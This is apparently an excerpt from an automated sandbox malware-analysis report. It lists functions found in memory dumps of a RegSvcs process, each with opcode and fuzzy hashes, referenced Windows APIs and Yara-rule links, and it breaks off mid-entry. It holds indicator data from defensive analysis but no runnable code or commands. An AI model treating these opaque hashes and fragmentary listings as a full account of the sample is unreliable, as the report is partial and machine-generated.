Instruction ID: fa29cc26f79513de7a5a9106aad5a11a33db075d2efbadce0d093af59e162066
Opcode Fuzzy Hash: b710cc9d51a8dee548c477adf02c54dad4ae0ec1468e0cba6e62b719d69f1c31
Instruction Fuzzy Hash: 1602F634905368CFCB66DF70C898799BBB1BF48306F2049E9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E784A Relevance: 3.3, APIs: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f89e6c68cdf7b44074b27674a8de324865906a2e61155cdd235c4fad63005e90
Instruction ID: 6541928d3aaa9372cb2401f51d3e9e68c602962907e84d8335471660654ab67e
Opcode Fuzzy Hash: f89e6c68cdf7b44074b27674a8de324865906a2e61155cdd235c4fad63005e90
Instruction Fuzzy Hash: 8902F634905368CFCB66DF70C898799BBB1BF48306F208AE9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E78B0 Relevance: 3.3, APIs: 2, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5c5ec38ea11b70ef51cf859e8d0b53c3529e80bb2ec565679007b57d6c385a56
Instruction ID: 207b7710c6f1cfc3a86e70b277a396d4d3403481ffc3384fdaf2858e2ced125a
Opcode Fuzzy Hash: 5c5ec38ea11b70ef51cf859e8d0b53c3529e80bb2ec565679007b57d6c385a56
Instruction Fuzzy Hash: B502F634905368CFCB65DF70C898799BBB1BF48306F204AE9D40AA6790DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E78F5 Relevance: 3.3, APIs: 2, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 206cbada37b03de9851e8e3d640955a679d218918ab370dce11ec9b19ebf340c
Instruction ID: 7f32ee628c58f5368f2bbdccc027681a171ffaadafcadbf05c968ec96a4bf734
Opcode Fuzzy Hash: 206cbada37b03de9851e8e3d640955a679d218918ab370dce11ec9b19ebf340c
Instruction Fuzzy Hash: DC02F634905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E793A Relevance: 3.3, APIs: 2, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a2b821bba5f5f4f4d0b57b21ac3eb0ad4bccc4c8c475e7678f4335e589524aa0
Instruction ID: f7f7665efc6acc77655e7909d16a705d9274f5ebfc2121bd872dc7c47a06cfee
Opcode Fuzzy Hash: a2b821bba5f5f4f4d0b57b21ac3eb0ad4bccc4c8c475e7678f4335e589524aa0
Instruction Fuzzy Hash: CD02F534905368CFCB25DF70C898799BBB1BF48306F208AE9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E797F Relevance: 3.3, APIs: 2, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 32fd66868bb933f0a2fefd8ffb33e65a1fb61f6734de03d70b4ee92228fc973b
Instruction ID: 4c16a9f21ecc85d92f030c5e4cdc3c56417449b414ee37842017d6bd226c2274
Opcode Fuzzy Hash: 32fd66868bb933f0a2fefd8ffb33e65a1fb61f6734de03d70b4ee92228fc973b
Instruction Fuzzy Hash: 29F10534905368CFCB66DF70C898799BBB1BF48306F208AE9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E79BB Relevance: 3.3, APIs: 2, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 547c0916d2460622d806faf795faaf838f7e9aafa28d315fc5b0db325b53d50f
Instruction ID: 4656ae4a26a390630964d8fdc4185e18c7f048b880ab244e3b77763e1099be92
Opcode Fuzzy Hash: 547c0916d2460622d806faf795faaf838f7e9aafa28d315fc5b0db325b53d50f
Instruction Fuzzy Hash: 7CF10534905368CFCB25DF70C898799BBB1BF48306F208AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7A00 Relevance: 3.3, APIs: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 16025caca11eda7883f31c242ab71b45ab65953158cdbfaa58a1a37adebc2807
Instruction ID: b1f0f1ff01af18b55739ffdaaa485e0afad0aa91eaaa9333a4ba7c1784e7246a
Opcode Fuzzy Hash: 16025caca11eda7883f31c242ab71b45ab65953158cdbfaa58a1a37adebc2807
Instruction Fuzzy Hash: 2FF1F534905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7A45 Relevance: 3.3, APIs: 2, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 244c2b6738bb0e05d73f8cb9e1e38c24ae44bad2fb10dfd7cd0a0aabf6a5cb01
Instruction ID: 91730c60d403c19e0f048dbd215ad1345063f4a1390b10d41706b7fbcef9a076
Opcode Fuzzy Hash: 244c2b6738bb0e05d73f8cb9e1e38c24ae44bad2fb10dfd7cd0a0aabf6a5cb01
Instruction Fuzzy Hash: 6CF1E534905368CFCB65DF70C898799BBB1BF48306F208AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7A8A Relevance: 3.3, APIs: 2, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9f07b88dc4bc34612b55e5f8fdda4e8f5396d0b4860e616e2d8c8b00b0a40a4b
Instruction ID: 1b860c11d499f1127ca3229f45d99018ae403c1831087ac20ccf3e99871987a2
Opcode Fuzzy Hash: 9f07b88dc4bc34612b55e5f8fdda4e8f5396d0b4860e616e2d8c8b00b0a40a4b
Instruction Fuzzy Hash: F1E1F534905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7ACF Relevance: 3.3, APIs: 2, Instructions: 284COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1601e3d47173c1477c0c62bddec5c0789ed764a07b01bcb116745324d6b63f01
Instruction ID: 131d93c13658879f28becb245bd39d4f317218cfbd18ceee07533e291ac35c03
Opcode Fuzzy Hash: 1601e3d47173c1477c0c62bddec5c0789ed764a07b01bcb116745324d6b63f01
Instruction Fuzzy Hash: 64E1F434905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7B14 Relevance: 3.3, APIs: 2, Instructions: 277COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 05581fed0e4e7a42775cf87b8d484a08517b9509e4e5630759ccccf507bc3039
Instruction ID: 98ddd2811bf0e172b1dde2b5821c10666d6ec3910bd5f00ef8a0b9217045ee15
Opcode Fuzzy Hash: 05581fed0e4e7a42775cf87b8d484a08517b9509e4e5630759ccccf507bc3039
Instruction Fuzzy Hash: AEE10534905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7B59 Relevance: 3.3, APIs: 2, Instructions: 270COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ed12edee5b9e1c13d3a1dfd22808acdf7dec720bac62ef74ec7fe9e6bd85443e
Instruction ID: 46b9c2cda4dd1db9a9b2f06f5bfc07063ad24e71db2bb52374be6eb82d1c09df
Opcode Fuzzy Hash: ed12edee5b9e1c13d3a1dfd22808acdf7dec720bac62ef74ec7fe9e6bd85443e
Instruction Fuzzy Hash: 0CE1F534905368CFCB25DF70C898799BBB1BF48316F208AD9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7B9E Relevance: 3.3, APIs: 2, Instructions: 263COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0b2ce29af579d884367d3095ae5bc1f4cbd5ae9f775bce0134e2c75370c36527
Instruction ID: e67fc47b9d969fb9f008150bd08b9980e6975eb9cedb6362f313d25369417153
Opcode Fuzzy Hash: 0b2ce29af579d884367d3095ae5bc1f4cbd5ae9f775bce0134e2c75370c36527
Instruction Fuzzy Hash: EBD10434905368CFCB66DF70C898799BBB1BF48306F204AE9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7BE3 Relevance: 3.3, APIs: 2, Instructions: 256COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a8631f11f9979c4f5254de6fb209fe3fec537b72fb925921ce3dfe0e977afa51
Instruction ID: 2e69b500a35c1a28129a9c97ae38a52947bd5f8b4f91db29c1edf49ef2c879db
Opcode Fuzzy Hash: a8631f11f9979c4f5254de6fb209fe3fec537b72fb925921ce3dfe0e977afa51
Instruction Fuzzy Hash: 11D10534905368CFCB25DF70C898799BBB1BF48306F204AD9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7C28 Relevance: 3.2, APIs: 2, Instructions: 249COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c1e2337c4f76c8299cab06d550bc41c4b44ec521f8201eda8f2f9d65da14a965
Instruction ID: 39b80b77a7faa1427ee1da85b677220b68a1820a64c0fa07974398c7d6a2c539
Opcode Fuzzy Hash: c1e2337c4f76c8299cab06d550bc41c4b44ec521f8201eda8f2f9d65da14a965
Instruction Fuzzy Hash: 43D1F434905368CFCB66DB70C898799BBB1BF48306F204AD9D40AA6750DB359E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7C6D Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f153b901c57ce3e272c5f70579c26952985fb16c3213ea534005ec30b6a5fc9f
Instruction ID: 19e07dcb1b33a56ac298d39df7cf3ddeb0c84fdc6478f5c49eabdd9f078bca5c
Opcode Fuzzy Hash: f153b901c57ce3e272c5f70579c26952985fb16c3213ea534005ec30b6a5fc9f
Instruction Fuzzy Hash: 63C1E434905368CFCB66DB70C898799BBB1FF48306F208AE9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7CB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3a92900695b0ad42b1cb47f92a44864ef3a272988c82e0b7724ea4bf4682b3c4
Instruction ID: aab1b90c9a257c2bce59e2aa2b382723b89dfd82ac7945f529fbe089d118a70c
Opcode Fuzzy Hash: 3a92900695b0ad42b1cb47f92a44864ef3a272988c82e0b7724ea4bf4682b3c4
Instruction Fuzzy Hash: D9C1E434905368CFCB66DB70C898799BBB1FF48306F208AE9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7CF7 Relevance: 3.2, APIs: 2, Instructions: 228COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 624e53e6b3c000b05b90415cc7410e1ba964789d4fa388e7a86a3db3a5e53666
Instruction ID: eb7eb1b4edd45216cd1bb14270e7a2c5dd78547c80b9edda8fd889382d86b984
Opcode Fuzzy Hash: 624e53e6b3c000b05b90415cc7410e1ba964789d4fa388e7a86a3db3a5e53666
Instruction Fuzzy Hash: 77C1E434905368CFCB66DB70C898799BBB1FF48306F208AD9D40AA6750DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7D3C Relevance: 3.2, APIs: 2, Instructions: 219COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1be633a0a642953cb3a9273da53f66b1e997f915c9f7eaecbe84c266e8646c72
Instruction ID: 2279d689900b810f41869fe679b5aeebb9d74f2da07db35a627adba277c809fa
Opcode Fuzzy Hash: 1be633a0a642953cb3a9273da53f66b1e997f915c9f7eaecbe84c266e8646c72
Instruction Fuzzy Hash: 47B1E534905368CFCB66DB70C898799BBB1FF48306F208AD9D40AA6790DB355E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7D78 Relevance: 3.2, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8ef30e8f11613a9320bcadd481b2fb0bdb8243bff7e3f7b163795f752ab92af7
Instruction ID: b938e74f25c8cc7250881767f6a0bcbffc05a798224a45d99ec99037c71467f6
Opcode Fuzzy Hash: 8ef30e8f11613a9320bcadd481b2fb0bdb8243bff7e3f7b163795f752ab92af7
Instruction Fuzzy Hash: 7FB1E434905368CFCB65DB70C898799BBB1FF48306F208AD9D40AA6750DB355D89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003E7DBD Relevance: 3.2, APIs: 2, Instructions: 205COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4a56990cf308b8be3c2012f875b8ffb9028b966a43b6b16836109c17c8f34487
Instruction ID: afe5390a8abeba304129595d8cf19b9f98b8a2c702a26ea38019c053b4c19c9f
Opcode Fuzzy Hash: 4a56990cf308b8be3c2012f875b8ffb9028b966a43b6b16836109c17c8f34487
Instruction Fuzzy Hash: 9DB1D434905368CFCB65DB70C898799BBB1FF48306F208AE9D40AA6790DB355D89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00623700 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

h+U, xrefs: 006237F6
h+U, xrefs: 00623A92

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: h+U$h+U
API String ID: 0-3158872657
Opcode ID: a75d611e099374a37dc58af149faa635672f3891c436f1678276407efa92a741
Instruction ID: 59fe525a6af72f398952e5004a2f6104624d341341065ad97f00b629757b5071
Opcode Fuzzy Hash: a75d611e099374a37dc58af149faa635672f3891c436f1678276407efa92a741
Instruction Fuzzy Hash: 13D14B34B007248FDB149FB4E4546AEB7E2AF85315F118529E81ADB395EF38DD4ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 001CD9B4 Relevance: 2.7, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

Strings

~o, xrefs: 001CDB60

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID: ~o
API String ID: 0-1287187916
Opcode ID: 2420172b17ca55a2a47b721b9ee47a1c2031fc1127ce23b9ad0e814e39a336a6
Instruction ID: cd9f62681941700b873e664a238ee55797697b5a3151fdc22db9e2d2de993b40
Opcode Fuzzy Hash: 2420172b17ca55a2a47b721b9ee47a1c2031fc1127ce23b9ad0e814e39a336a6
Instruction Fuzzy Hash: FB62DD2944E7C14FC3578B746D64AA23FB0AE27624B5E01FFC581CF1E3D25A891AD326

Uniqueness

Uniqueness Score: -1.00%

Function 0062E458 Relevance: 1.8, Strings: 1, Instructions: 525COMMON

Download Yara Rule

Strings

h+U, xrefs: 0062E99F

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: h+U
API String ID: 0-3572767640
Opcode ID: be46b2e84e073d383d34b1b1873ba346683a73b31ae5be886dd27f9d2269204a
Instruction ID: f721fe5cdfca4b7cd25182e04eb6aea72cd36f8a54b91344c1b456d77c128b09
Opcode Fuzzy Hash: be46b2e84e073d383d34b1b1873ba346683a73b31ae5be886dd27f9d2269204a
Instruction Fuzzy Hash: FC127F30E006148FDB20DBA8E494BADBBF2EB45314F24857AE419EB791DB36DC858F51

Uniqueness

Uniqueness Score: -1.00%

Function 003E7E0F Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0ea13b4025b9214a6edbf7ef1a7adfbba20fdb9ac19f132384e1142069fed2e7
Instruction ID: 434a2e46e5fb6fc5d7a4e09e4a751e7bf6832979fa811c497a4a4ea3784fe031
Opcode Fuzzy Hash: 0ea13b4025b9214a6edbf7ef1a7adfbba20fdb9ac19f132384e1142069fed2e7
Instruction Fuzzy Hash: C4A1D434905368CFCB66DB70C898799BBB1FF48306F208AD9D40AA6790DB359D89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 006E7588 Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f952f78af0a5a8b95da4c71fffa9c849633092d8acb383174752223a427422b0
Instruction ID: 23d44421d9cc0b8fa2944d8a9aba480d234049216b9534ac542819ec2733f5eb
Opcode Fuzzy Hash: f952f78af0a5a8b95da4c71fffa9c849633092d8acb383174752223a427422b0
Instruction Fuzzy Hash: 7541F631A093848FDB10CF6AD845BEEBBB2EB86314F20446AD405E7751D734DD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006E8074 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(?,?,?,?), ref: 006E8181

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 13ce8dd24752e9e2f38ee2161c0358dcbade3cbb757a05d45bcc5ab63701be5b
Instruction ID: 4b7490eee34d4accf6ef1ac075ed85b7aa126d8970f740dfc605bc3f1698f079
Opcode Fuzzy Hash: 13ce8dd24752e9e2f38ee2161c0358dcbade3cbb757a05d45bcc5ab63701be5b
Instruction Fuzzy Hash: 1F415670D057899FDB14CFAAC894BDEBBB2BF49314F148029E819AB351CB749846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00622610 Relevance: 1.6, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

h+U, xrefs: 0062273F

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: h+U
API String ID: 0-3572767640
Opcode ID: 5aa6e81e9a5a3675e09d41b318262bda5e95e5ce96d95499adb79a6c70319088
Instruction ID: 85fd623998108646506aa1a386800bcd960fc05529fe524c36d0eea25155271f
Opcode Fuzzy Hash: 5aa6e81e9a5a3675e09d41b318262bda5e95e5ce96d95499adb79a6c70319088
Instruction Fuzzy Hash: D1D1CE30B002599FCB05DBB4E864AAD7BF2AF89305F148069E405EB395EF34DD4ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 006E8080 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(?,?,?,?), ref: 006E8181

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: a3104d62504353cacbec70e99b4c637b420b5dd2849affce4a3f06edf33e9c9f
Instruction ID: c5fb36e60cd9020a505e79de8f6a6fcdd95649985a6add39403db645447e3e7f
Opcode Fuzzy Hash: a3104d62504353cacbec70e99b4c637b420b5dd2849affce4a3f06edf33e9c9f
Instruction Fuzzy Hash: 66413570D057999FDB14CFAAC884BDEBBB2BF48314F148029E819AB341DB749946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003EAC24 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 003EC591

Memory Dump Source

